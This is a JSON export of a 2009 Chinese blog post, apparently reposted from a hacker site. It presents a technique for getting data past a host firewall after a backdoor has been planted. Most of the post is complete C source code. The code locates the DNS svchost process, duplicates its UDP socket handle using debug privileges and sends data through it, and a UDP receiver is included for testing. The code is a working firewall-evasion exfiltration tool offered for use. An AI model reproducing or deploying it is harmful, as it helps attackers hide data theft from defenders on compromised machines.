{"id":120,"date":"2009-07-15T08:41:34","date_gmt":"2009-07-15T08:41:34","guid":{"rendered":""},"modified":"2011-11-18T16:58:50","modified_gmt":"2011-11-18T08:58:50","slug":"120","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/120.html","title":{"rendered":"\u4e00\u79cd\u65b0\u7684\u7a7f\u900f\u9632\u706b\u5899\u7684\u6570\u636e\u4f20\u8f93\u6280\u672f"},"content":{"rendered":"

\u539f\u59cb\u51fa\u5904\uff1a<\/span>http:\/\/www.cnxhacker.com\/<\/span><\/a>
\n\u4f7f\u7528\u8be5\u6280\u672f\u80cc\u666f\uff1a <\/span><\/p>\n

\u5728\u76ee\u6807\u4e3b\u673a\u5b89\u653e\u540e\u95e8\uff0c\u9700\u8981\u5c06\u6570\u636e\u4f20\u8f93\u51fa\u53bb\uff0c\u540c\u65f6\u6570\u636e\u5f88\u91cd\u8981\uff0c\u52a8\u4f5c\u4e0d\u80fd\u592a\u5927\u3002\u5176\u4ed6\u60c5\u51b5\u201c\u4e25\u91cd\u201d\u4e0d\u63a8\u8350\u4f7f\u7528\u8be5\u6280\u672f(\u540e\u9762\u6211\u4f1a\u8bb2\u5230\u4e3a\u4ec0\u4e48)\u3002<\/p>\n

\u9488\u5bf9\u76ee\u524d\u9632\u706b\u5899\u7684\u4e00\u4e9b\u60c5\u51b5\uff0c\u5982\u679c\u81ea\u5df1\u7684\u8fdb\u7a0b\u5f00\u4e00\u4e2a\u7aef\u53e3(\u751a\u81f3\u662f\u65b0\u5efa\u5957\u63a5\u5b57)\u80af\u5b9a\u88ab\u62e6\u3002\u76f8\u53cd\uff0c\u6709\u4e00\u70b9\u6211\u4eec\u4e5f\u5f88\u6e05\u695a\uff1a\u88ab\u9632\u706b\u5899\u9a8c\u8bc1\u7684\u8fdb\u7a0b\u5728\u4f20\u9001\u6570\u636e\u65f6\u6c38\u8fdc\u4e0d\u4f1a\u88ab\u62e6\u3002\u6240\u4ee5\uff0c\u6211\u7684\u601d\u8def\u5f88\u7b80\u5355\uff1a\u5c06\u5176\u4ed6\u8fdb\u7a0b\u4e2d\u5141\u8bb8\u6570\u636e\u4f20\u8f93\u7684\u5957\u63a5\u5b57\u53e5\u67c4\u62ff\u4e3a\u5df2\u7528\u3002<\/p>\n

\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n

1. \u627e\u51fa\u76ee\u6807\u8fdb\u7a0b<\/p>\n

2. \u627e\u51faSOCKET\u53e5\u67c4<\/p>\n

2. \u7528DuplicateHandle()\u51fd\u6570\u5c06\u5176SOCKET\u8f6c\u6362\u4e3a\u80fd\u88ab\u81ea\u5df1\u4f7f\u7528<\/p>\n

3. \u7528\u8f6c\u6362\u540e\u7684SOCKET\u8fdb\u884c\u6570\u636e\u4f20\u8f93
\n\u4e0a\u9762\u7684\u8fc7\u7a0b\u5199\u7684\u5f88\u7b80\u5355\uff0c\u4f46\u662f\u5b9e\u9645\u5b9e\u73b0\u8d77\u6765\u8fd8\u662f\u5b58\u5728\u4e00\u4e9b\u95ee\u9898(\u540e\u9762\u518d\u505a\u8ba8\u8bba<\/span>)\uff0c\u800c\u4e14\u4ece\u4e0a\u9762\u7684\u5b9e\u73b0\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u770b\u51fa\u4e00\u4e9b\u4e0d\u723d\u7684\u5730\u65b9\uff1a\u5728\u76ee\u6807\u8fdb\u7a0b\u7684SOCKET\u4e0d\u80fd\u662fTCP\uff0c\u56e0\u4e3aTCP\u7684\u53e5\u67c4\u5df2\u7ecf\u8ddf\u5916\u9762\u5efa\u7acb\u4e86\u8fde\u63a5\uff0c\u6240\u4ee5\u53ea\u80fd\u662fUDP\u3002\u9488\u5bf9\u4e0d\u540c\u7cfb\u7edf\u4e0d\u540c\u8fdb\u7a0b\u6211\u4eec\u5f88\u96be\u5b9a\u4f4d\u4e00\u4e2a\u7a33\u5b9a\u7684\u8fdb\u7a0bSOCKET\u3002<\/p>\n

\u770b\u5230\u4e0a\u9762\u8fd9\u4e9b\uff0c\u4f60\u6709\u70b9\u4e27\u6c14\u4e86\u5bf9\u4e0d\u5bf9\uff0c\u54c8\u54c8\u3002 \u518d\u60f3\u4e00\u60f3\uff0c\u5176\u5b9e\u6211\u4eec\u6709\u4e00\u6761\u771f\u6b63\u7684\u901a\u7f57\u9a6c\u7684\u201c\u9ec4\u91d1\u5927\u9053\u201d\u3002<\/p>\n

\u6211\u4eec\u77e5\u9053\u53ea\u8981\u4e00\u53f0\u8ba1\u7b97\u673a\u8fde\u4e0a\u4e86\u7f51\u7edc\uff0c\u90a3\u4e48\u6709\u4e00\u79cd\u6570\u636e\u4f20\u8f93\u662f\u80af\u5b9a\u4e0d\u4f1a\u88ab\u62e6\u622a\u7684\uff0c\u90a3\u5c31\u662fDNS\u3002\u4f60\u80fd\u60f3\u50cf\u57df\u540d\u89e3\u6790\u6570\u636e\u90fd\u88ab\u62e6\u4e86\u9020\u6210\u7684\u7ed3\u679c\u5417\uff1f \u563f\u563f\uff0c \u65e2\u7136\u8fd9\u4e2a\u662f\u6c38\u8fdc\u4e0d\u4f1a\u88ab\u62e6\u7684\uff0c \u800c\u4e14\u5b83\u53c8\u662fUDP\u4f20\u8f93\uff0c \u6211\u4eec\u5c31\u62ff\u4ed6\u5f00\u5200\u3002<\/p>\n

\u4e0b\u9762\u662f\u901a\u8fc7\u76f4\u63a5\u63a7\u5236DNS\u8fdb\u7a0b(\u5176\u5b9e\u4e5f\u5c31\u662fsvchost.exe\uff0c\u4e0d\u8fc7\u5bf9\u5e94\u7528\u6237\u540d\u662fNETWORK SERVICE)\u8fdb\u884c\u6570\u636e\u4f20\u8f93\u7684\u4f8b\u5b50\u3002\u7f16\u7a0b\u4e2d\u51fa\u73b0\u4e86\u5f88\u591a\u95ee\u9898\uff0c\u6bd4\u65b9\u8bf4\u83b7\u53d6svchost\u5bf9\u5e94\u7528\u6237\u540d\u65f6\u6ca1\u6709\u6743\u9650(\u4f46\u662f\u80fd\u591f\u64cd\u4f5cLOCAL SERVICE)\uff0c\u5728\u53e5\u67c4\u503c\u4e3a0x2c\u65f6\u8fdb\u884cgetsockname\u65f6\u4f1a\u505c\u6b62\u8fd0\u884c\u7b49\u7b49\u3002\u5177\u4f53\u89e3\u51b3\u65b9\u6cd5\u8bf7\u7ec6\u770b\u6ce8\u91ca\u90e8\u5206\u3002<\/p>\n

CODE:<\/p>\n

\/*++<\/p>\n

Made By ZwelL<\/p>\n

zwell@sohu.com<\/span><\/a><\/p>\n

2005.4.12<\/span><\/p>\n

–*\/<\/p>\n

#include <winsock2.h><\/p>\n

#include <stdio.h><\/p>\n

#include <wtsapi32.h><\/p>\n

#pragma comment(lib, “ws2_32”)<\/p>\n

#pragma comment(lib, “wtsapi32”)<\/p>\n

#define NT_SUCCESS(status)\u00a0 \u00a0 ((NTSTATUS)(status)>=0)<\/p>\n

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)<\/p>\n

typedef LONG\u00a0\u00a0NTSTATUS;<\/p>\n

typedef struct _SYSTEM_HANDLE_INFORMATION<\/p>\n

{<\/p>\n

ULONG\u00a0 \u00a0\u00a0\u00a0ProcessId;<\/p>\n

UCHAR\u00a0 \u00a0\u00a0\u00a0ObjectTypeNumber;<\/p>\n

UCHAR\u00a0 \u00a0\u00a0\u00a0Flags;<\/p>\n

USHORT\u00a0 \u00a0\u00a0\u00a0Handle;<\/p>\n

PVOID\u00a0 \u00a0\u00a0\u00a0Object;<\/p>\n

ACCESS_MASK\u00a0 \u00a0GrantedAccess;<\/p>\n

} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;<\/p>\n

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);<\/p>\n

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;<\/p>\n

BOOL LocateNtdllEntry ( void )<\/p>\n

{<\/p>\n

BOOL\u00a0\u00a0ret\u00a0 \u00a0 = FALSE;<\/p>\n

char\u00a0\u00a0NTDLL_DLL[] = “ntdll.dll”;<\/p>\n

HMODULE ntdll_dll\u00a0\u00a0= NULL;<\/p>\n

if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )<\/p>\n

{<\/p>\n

printf( “GetModuleHandle() failed”);<\/p>\n

return( FALSE );<\/p>\n

}<\/p>\n

if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress<\/p>\n

( ntdll_dll, “ZwQuerySystemInformation” ) ) )<\/p>\n

{<\/p>\n

goto LocateNtdllEntry_exit;<\/p>\n

}<\/p>\n

ret = TRUE;<\/p>\n

LocateNtdllEntry_exit:<\/p>\n

if ( FALSE == ret )<\/p>\n

{<\/p>\n

printf( “GetProcAddress() failed”);<\/p>\n

}<\/p>\n

ntdll_dll = NULL;<\/p>\n

return( ret );<\/p>\n

}<\/p>\n

\/*++<\/p>\n

This routine is used to get a process&#39;s username from it&#39;s SID<\/p>\n

–*\/<\/p>\n

BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)<\/p>\n

{<\/p>\n

\/\/ sanity checks and default value<\/p>\n

if (pUserSid == NULL)<\/p>\n

return false;<\/p>\n

strcpy(szUserName, “?”);<\/p>\n

SID_NAME_USE\u00a0\u00a0snu;<\/p>\n

TCHAR\u00a0 \u00a0 szUser[_MAX_PATH];<\/p>\n

DWORD\u00a0 \u00a0 chUser = _MAX_PATH;<\/p>\n

PDWORD\u00a0 \u00a0 pcchUser = &chUser;<\/p>\n

TCHAR\u00a0 \u00a0 szDomain[_MAX_PATH];<\/p>\n

DWORD\u00a0 \u00a0 chDomain = _MAX_PATH;<\/p>\n

PDWORD\u00a0 \u00a0 pcchDomain = &chDomain;<\/p>\n

\/\/ Retrieve user name and domain name based on user&#39;s SID.<\/p>\n

if (<\/p>\n

::LookupAccountSid(<\/p>\n

NULL,<\/p>\n

pUserSid,<\/p>\n

szUser,<\/p>\n

pcchUser,<\/p>\n

szDomain,<\/p>\n

pcchDomain,<\/p>\n

&snu<\/p>\n

)<\/p>\n

)<\/p>\n

{<\/p>\n

wsprintf(szUserName, “%s”, szUser);<\/p>\n

}<\/p>\n

else<\/p>\n

{<\/p>\n

return false;<\/p>\n

}<\/p>\n

return true;<\/p>\n

}<\/p>\n

\/*++<\/p>\n

This routine is used to get the DNS process&#39;s Id<\/p>\n

Here, I use WTSEnumerateProcesses to get process user Sid,<\/p>\n

and then get the process user name. Beacause as it&#39;s a “NETWORK SERVICE”,<\/p>\n

we cann&#39;t use OpenProcessToken to catch the DNS process&#39;s token information,<\/p>\n

even if we has the privilege in catching the SYSTEM&#39;s.<\/p>\n

–*\/<\/p>\n

DWORD GetDNSProcessId()<\/p>\n

{<\/p>\n

PWTS_PROCESS_INFO pProcessInfo = NULL;<\/p>\n

DWORD\u00a0 \u00a0\u00a0\u00a0ProcessCount = 0;<\/p>\n

char\u00a0 \u00a0\u00a0\u00a0szUserName[255];<\/p>\n

DWORD\u00a0 \u00a0\u00a0\u00a0Id = -1;<\/p>\n

if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))<\/p>\n

{<\/p>\n

\/\/ dump each process description<\/p>\n

for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)<\/p>\n

{<\/p>\n

if( strcmp(pProcessInfo[CurrentProcess].pProcessName, “svchost.exe”) == 0 )<\/p>\n

{<\/p>\n

GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);<\/p>\n

if( strcmp(szUserName, “NETWORK SERVICE”) == 0)<\/p>\n

{<\/p>\n

Id = pProcessInfo[CurrentProcess].ProcessId;<\/p>\n

break;<\/p>\n

}<\/p>\n

}<\/p>\n

}<\/p>\n

WTSFreeMemory(pProcessInfo);<\/p>\n

}<\/p>\n

return Id;<\/p>\n

}<\/p>\n

\/*++<\/p>\n

This doesn&#39;t work as we know, sign…<\/p>\n

but you can use the routine for other useing…<\/p>\n

–*\/<\/p>\n

\/*<\/p>\n

BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)<\/p>\n

{<\/p>\n

HANDLE hProcess = NULL,<\/p>\n

hAccessToken = NULL;<\/p>\n

TCHAR InfoBuffer<\/span>[1000], szDomainName[200];<\/p>\n

PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;<\/p>\n

DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;<\/p>\n

SID_NAME_USE snu;<\/p>\n

hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);<\/p>\n

if(hProcess == NULL)<\/p>\n

{<\/p>\n

printf(“OpenProcess wrong”);<\/p>\n

CloseHandle(hProcess);<\/p>\n

return false;<\/p>\n

}<\/p>\n

if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))<\/p>\n

{<\/p>\n

printf(“OpenProcessToken wrong:%08x”, GetLastError());<\/p>\n

return false;<\/p>\n

}<\/p>\n

GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,<\/p>\n

1000, &dwInfoBufferSize);<\/p>\n

LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,<\/p>\n

&dwAccountSize,szDomainName, &dwDomainSize, &snu);<\/p>\n

if(hProcess)<\/p>\n

CloseHandle(hProcess);<\/p>\n

if(hAccessToken)<\/p>\n

CloseHandle(hAccessToken);<\/p>\n

return true;<\/p>\n

}*\/<\/p>\n

\/*++<\/p>\n

Now, it is the most important stuff… ^_^<\/p>\n

–*\/<\/p>\n

SOCKET GetSocketFromId (DWORD PID)<\/p>\n

{<\/p>\n

NTSTATUS\u00a0 \u00a0\u00a0 \u00a0\u00a0\u00a0status;<\/p>\n

PVOID\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0buf\u00a0\u00a0= NULL;<\/p>\n

ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0size = 1;<\/p>\n

ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0NumOfHandle = 0;<\/p>\n

ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0i;<\/p>\n

PSYSTEM_HANDLE_INFORMATION\u00a0\u00a0h_info = NULL;<\/p>\n

HANDLE\u00a0\u00a0sock = NULL;<\/p>\n

DWORD\u00a0\u00a0n;<\/p>\n

buf=malloc(0x1000);<\/p>\n

if(buf == NULL)<\/p>\n

{<\/p>\n

printf(“malloc wrong
\n“);<\/p>\n

return NULL;<\/p>\n

}<\/p>\n

status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );<\/p>\n

if(STATUS_INFO_LENGTH_MISMATCH == status)<\/p>\n

{<\/p>\n

free(buf);<\/p>\n

buf=malloc(n);<\/p>\n

if(buf == NULL)<\/p>\n

{<\/p>\n

printf(“malloc wrong
\n“);<\/p>\n

return NULL;<\/p>\n

}<\/p>\n

status = ZwQuerySystemInformation( 0x10, buf, n, NULL);<\/p>\n

}<\/p>\n

else<\/p>\n

{<\/p>\n

printf(“ZwQuerySystemInformation wrong
\n“);<\/p>\n

return NULL;<\/p>\n

}<\/p>\n

NumOfHandle = *(ULONG*)buf;<\/p>\n

h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);<\/p>\n

for(i = 0; i<NumOfHandle ;i++)<\/p>\n

{<\/p>\n

try<\/p>\n

{<\/p>\n

if( ( h_info.ProcessId == PID ) && ( h_info<\/span>.ObjectTypeNumber == 0x1c ) <\/span><\/p>\n

&& (h_info.Handle!=0x2c)\u00a0\u00a0\/\/ I don&#39;t know why if the Handle equal to 0x2c,<\/span><\/p>\n

in my test, it stops at getsockname()<\/p>\n

\/\/ So I jump over this situation…<\/p>\n

\/\/ May be it&#39;s different in your system,<\/p>\n

) \/\/wind2000 is 0x1a<\/p>\n

{<\/p>\n

\/\/printf(“Handle:0x%x Type:%08x
\n“,h_info.Handle, h_info<\/span>.ObjectTypeNumber);<\/span><\/p>\n

if( 0 == DuplicateHandle(<\/p>\n

OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),<\/p>\n

(HANDLE)h_info.Handle, <\/span><\/p>\n

GetCurrentProcess(),<\/p>\n

&sock,<\/p>\n

STANDARD_RIGHTS_REQUIRED,<\/p>\n

true,<\/p>\n

DUPLICATE_SAME_ACCESS)<\/p>\n

)<\/p>\n

{<\/p>\n

printf(“DuplicateHandle wrong:%8x”, GetLastError());<\/p>\n

continue;<\/p>\n

}<\/p>\n

\/\/printf(“DuplicateHandle ok
\n“);<\/p>\n

sockaddr_in name = {0};<\/p>\n

name.sin_family = AF_INET;<\/p>\n

int namelen = sizeof(sockaddr_in);<\/p>\n

getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );<\/p>\n

\/\/printf(“PORT=%5d
\n“,\u00a0\u00a0ntohs( name.sin_port ));<\/p>\n

if(ntohs(name.sin_port)>0)\u00a0\u00a0\/\/ if port > 0, then we can use it<\/p>\n

break;<\/p>\n

}<\/p>\n

}<\/p>\n

catch(…)<\/p>\n

{<\/p>\n

continue;<\/p>\n

}<\/p>\n

}<\/p>\n

if ( buf != NULL )<\/p>\n

{<\/p>\n

free( buf );<\/p>\n

}<\/p>\n

return (SOCKET)sock;<\/p>\n

}<\/p>\n

\/*++<\/p>\n

This is not required…<\/p>\n

–*\/<\/p>\n

BOOL EnablePrivilege (PCSTR name)<\/p>\n

{<\/p>\n

HANDLE hToken;<\/p>\n

BOOL rv;<\/p>\n

TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };<\/p>\n

LookupPrivilegeValue (<\/p>\n

0,<\/p>\n

name,<\/p>\n

&priv.Privileges[0].Luid<\/p>\n

);<\/p>\n

priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;<\/p>\n

OpenProcessToken(<\/p>\n

GetCurrentProcess (),<\/p>\n

TOKEN_ADJUST_PRIVILEGES,<\/p>\n

&hToken<\/p>\n

);<\/p>\n

AdjustTokenPrivileges (<\/p>\n

hToken,<\/p>\n

FALSE,<\/p>\n

&priv,<\/p>\n

sizeof priv,<\/p>\n

0,<\/p>\n

0<\/p>\n

);<\/p>\n

rv = GetLastError () == ERROR_SUCCESS;<\/p>\n

CloseHandle (hToken);<\/p>\n

return rv;<\/p>\n

}<\/p>\n

void main()<\/p>\n

{<\/p>\n

WSADATA wsaData;<\/p>\n

char\u00a0\u00a0testbuf[255];<\/p>\n

SOCKET\u00a0\u00a0sock;<\/p>\n

sockaddr_in RecvAddr;<\/p>\n

int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);<\/p>\n

if (iResult != NO_ERROR)<\/p>\n

printf(“Error at WSAStartup()
\n“);<\/p>\n

if(!LocateNtdllEntry())<\/p>\n

return;<\/p>\n

if(!EnablePr
\nivilege (SE_DEBUG_NAME)) { printf(“EnablePrivilege wrong
\n“); return; } sock = GetSocketFromId(GetDNSProcessId()); if( sock==NULL) { printf(“GetSocketFromId wrong
\n“); return; } \/\/Change there value… RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr(“127.0.0.1”); if(SOCKET_ERROR == sendto(sock, “test”, 5, 0, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr))) { printf(“sendto wrong:%d
\n“, WSAGetLastError()); } else { printf(“send ok… Have fun, right? ^_^
\n“); } getchar(); \/\/WSACleanup(); return; } [Copy to clipboard]<\/p>\n

\u5f88\u65e9\u4ee5\u524d\u6211\u5c31\u6709\u8fd9\u4e2a\u60f3\u6cd5\u4e86\uff0c\u53ea\u662f\u4e00\u76f4\u6ca1\u6709\u53bb\u5b9e\u73b0\u3002\u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u56e0\u4e3a\u8981\u627e\u51faDNS\u8fdb\u7a0b\u53e5\u67c4\uff0c\u800csvchost.exe\u53c8\u6709\u591a\u4e2a\uff0c\u6240\u4ee5\u4ee5\u7528\u6237\u540d\u6765\u8fdb\u884c\u5224\u65ad\uff0c\u672c\u6765\u662f\u7528OpenProcessToken\uff0c\u4f46\u662f\u600e\u4e48\u4e5f\u4e0d\u884c\u3002\u6240\u4ee5\u6362\u4e2a\u65b9\u6cd5\uff0c\u7528\u5230\u4e86wtsapi32\u5e93\u51fd\u6570\u3002<\/p>\n

\u518d\u7528\u4e0b\u9762\u7684\u4ee3\u7801\u6d4b\u8bd5\uff1a<\/p>\n

CODE:<\/p>\n

\/*++<\/p>\n

UdpReceiver<\/p>\n

–*\/<\/p>\n

#include <stdio.h><\/p>\n

#include “winsock2.h”<\/p>\n

#pragma comment(lib, “ws2_32”)<\/p>\n

void main()<\/p>\n

{<\/p>\n

WSADATA wsaData;<\/p>\n

SOCKET RecvSocket;<\/p>\n

sockaddr_in RecvAddr;<\/p>\n

int Port = 5555;<\/p>\n

char RecvBuf[1024];<\/p>\n

int BufLen = 1024;<\/p>\n

sockaddr_in SenderAddr;<\/p>\n

int SenderAddrSize = sizeof(SenderAddr);<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Initialize Winsock<\/p>\n

WSAStartup(MAKEWORD(2,2), &wsaData);<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Create a receiver socket to receive datagrams<\/p>\n

RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Bind the socket to any address and the specified port.<\/p>\n

RecvAddr.sin_family = AF_INET;<\/p>\n

RecvAddr.sin_port = htons(Port);<\/p>\n

RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);<\/p>\n

bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Call the recvfrom function to receive datagrams<\/p>\n

\/\/ on the bound socket.<\/p>\n

printf(“Receiving datagrams…
\n“);<\/p>\n

while(1)<\/p>\n

{<\/p>\n

recvfrom(RecvSocket,<\/p>\n

RecvBuf,<\/p>\n

BufLen,<\/p>\n

0,<\/p>\n

(SOCKADDR *)&SenderAddr,<\/p>\n

&SenderAddrSize);<\/p>\n

printf(“%s
\n“, RecvBuf);<\/p>\n

}<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Close the socket when finished receiving datagrams<\/p>\n

printf(“Finished receiving. Closing socket.
\n“);<\/p>\n

closesocket(RecvSocket);<\/p>\n

\/\/———————————————–<\/p>\n

\/\/ Clean up and exit.<\/p>\n

printf(“Exiting.
\n“);<\/p>\n

WSACleanup();<\/p>\n

return;<\/p>\n

}<\/p>\n

[Copy to clipboard]
\n\u6d4b\u8bd5\u6b65\u9aa4\uff1a<\/p>\n

1. \u5728\u4e00\u53f0\u673a\u5668\u4e0a\u6267\u884cUdpReceiver\u3002<\/p>\n

2. \u5728\u5b89\u88c5\u9632\u706b\u5899\u7684\u673a\u5668\u4e0a\u6267\u884c\u7b2c\u4e00\u4e2a\u7a0b\u5e8f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"

\u539f\u59cb\u51fa\u5904\uff1ahttp:\/\/www.cnxhacker.com\/ \u4f7f\u7528\u8be5\u6280\u672f\u80cc\u666f\uff1a …<\/p>\n

\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[111],"class_list":["post-120","post","type-post","status-publish","format-standard","hentry","tag-111"],"views":805,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=120"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/120\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}